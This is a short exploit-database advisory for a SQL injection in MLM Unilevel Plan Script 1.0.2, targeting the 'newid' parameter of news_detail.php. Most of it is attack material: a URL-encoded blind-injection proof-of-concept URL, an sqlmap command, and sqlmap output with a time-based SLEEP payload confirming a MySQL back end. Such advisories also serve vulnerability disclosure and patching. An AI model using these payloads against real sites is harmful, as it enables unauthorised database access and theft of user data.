Home / exploitsPDF  

MLM Unilevel Plan Script 1.0.2 SQL Injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>MLM Unilevel Plan Script 1.0.2 SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Application Name : MLM Unilevel Plan Script v1.0.2 # Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL # Author Contact : https://twitter.com/byn4tural # Vendor Homepage : http://www.i-netsolution.com/ # Vulnerable Type : SQL Injection # Date : 2016-10-06 # Tested on : Windows 10 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0.6.28#dev ###################### SQL Injection Vulnerability ###################### # Location : http://localhost/[path]/news_detail.php ###################### # PoC Exploit: http://localhost/[path]/news_detail.php?newid=11%27%20%2F*%2130000and%20ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%20and*%2F%20%27x%27%3D%27x # Exploit Code via sqlmap: sqlmap -u http://localhost/[path]/news_detail.php?newid=11 --dbs --- Parameter: newid (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: newid=11' AND SLEEP(5) AND 'HheB'='HheB --- [18:47:12] [INFO] the back-end DBMS is MySQL web application technology: Nginx back-end DBMS: MySQL >= 5.0.12 ###################### </BODY></HTML>

 

TOP